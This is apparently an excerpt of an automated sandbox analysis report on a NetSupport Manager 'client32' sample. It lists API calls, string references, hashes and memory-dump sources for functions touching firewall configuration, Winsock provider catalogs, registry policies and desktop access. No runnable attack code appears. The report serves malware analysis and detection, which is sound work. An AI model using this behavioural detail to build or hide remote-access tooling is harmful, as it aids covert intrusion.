                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Similarity
                                                                              • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                              • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                              • API String ID: 4263811268-2492245516
                                                                              • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                              • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                              APIs
                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Similarity
                                                                              • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                              • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                              • API String ID: 2061479752-1320826866
                                                                              • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                              • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11106E9E
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                              • GetTickCount.KERNEL32 ref: 11106EAD
                                                                              • GetTickCount.KERNEL32 ref: 11106F00
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                              • GetTickCount.KERNEL32 ref: 11106F3A
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                              • API String ID: 1574099134-3013461081
                                                                              • Opcode ID: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                              • Opcode Fuzzy Hash: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,AB86ACF8,?,00000000,00000000), ref: 1102D594
                                                                              • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                              • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                              • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                              • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                              • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                              • API String ID: 83693535-1096744297
                                                                              • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                              • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                              • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                              • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                              • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                              • API String ID: 596640303-1725438197
                                                                              • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                              • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                              • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                              Similarity
                                                                              • API ID: Enum$Open$CloseValue
                                                                              • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                              • API String ID: 2823542970-1528906934
                                                                              • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                              • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetTickCount.KERNEL32 ref: 111385E2
                                                                                • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              • GetTickCount.KERNEL32 ref: 111385F1
                                                                              • _memset.LIBCMT ref: 11138633
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                              • _strrchr.LIBCMT ref: 11138658
                                                                              • _free.LIBCMT ref: 111386AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                              • API String ID: 711243594-1270230032
                                                                              • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                              • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                              • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                              • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                              • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                              • GetDC.USER32(00000000), ref: 11134E13
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                              • CreateWindowExA.USER32(00000001,NSMWClass,037C0C60,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                              • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                              • API String ID: 1594747848-1114959992
                                                                              • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                              • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11133B70
                                                                              • GetTickCount.KERNEL32 ref: 11133BA1
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                              • GetTickCount.KERNEL32 ref: 11133BBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$FolderPathwsprintf
                                                                              • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                              • API String ID: 1170620360-4157686185
                                                                              • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                              • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                              • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                              APIs
                                                                              • _strtok.LIBCMT ref: 11027286
                                                                              • _strtok.LIBCMT ref: 110272C0
                                                                              • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strtok$Sleep
                                                                              • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                              • API String ID: 2009458258-3774545468
                                                                              • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                              • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                              • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                              APIs
                                                                                • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                              • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                              • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                              • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                              • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                              • CloseDesktop.USER32(00000000), ref: 11103829
                                                                              • GetLastError.KERNEL32 ref: 11103831
                                                                              • CloseDesktop.USER32(00000000), ref: 11103847
                                                                              • GetLastError.KERNEL32 ref: 1110384F
                                                                              Strings
                                                                              • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                              • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                              • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                              • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                              • API String ID: 2036220054-60805735
                                                                              • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                              • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                              • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                              • GetLastError.KERNEL32 ref: 1115F275
                                                                              • wsprintfA.USER32 ref: 1115F288
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                              • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                              • API String ID: 1734919802-1728070458
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 11110E4A
                                                                              • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                              • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                              • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                              • API String ID: 1976012330-1024648535
                                                                              APIs
                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,AB86ACF8,00000000,?,00000000), ref: 110613A4
                                                                              • _malloc.LIBCMT ref: 110613EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,AB86ACF8,00000000), ref: 1106142B
                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                              • _free.LIBCMT ref: 110614A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                              • API String ID: 999355418-161875503
                                                                              APIs
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,AB86ACF8,00000000,?), ref: 1115C927
                                                                              • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                              • wsprintfW.USER32 ref: 1115C967
                                                                              • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                              • wsprintfW.USER32 ref: 1115CA27
                                                                              • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                              • API String ID: 3050498177-823534439
                                                                              APIs
                                                                                • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              • _memset.LIBCMT ref: 11146055
                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 4251163631-545709139
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 1101567A
                                                                              • _memset.LIBCMT ref: 110156BE
                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                              Strings
                                                                              • NSLSP, xrefs: 11015708
                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                              • PackedCatalogItem, xrefs: 110156E2
                                                                              • %012d, xrefs: 11015674
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue_memsetwsprintf
                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                              • API String ID: 1333399081-1346142259
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                              • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                              • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
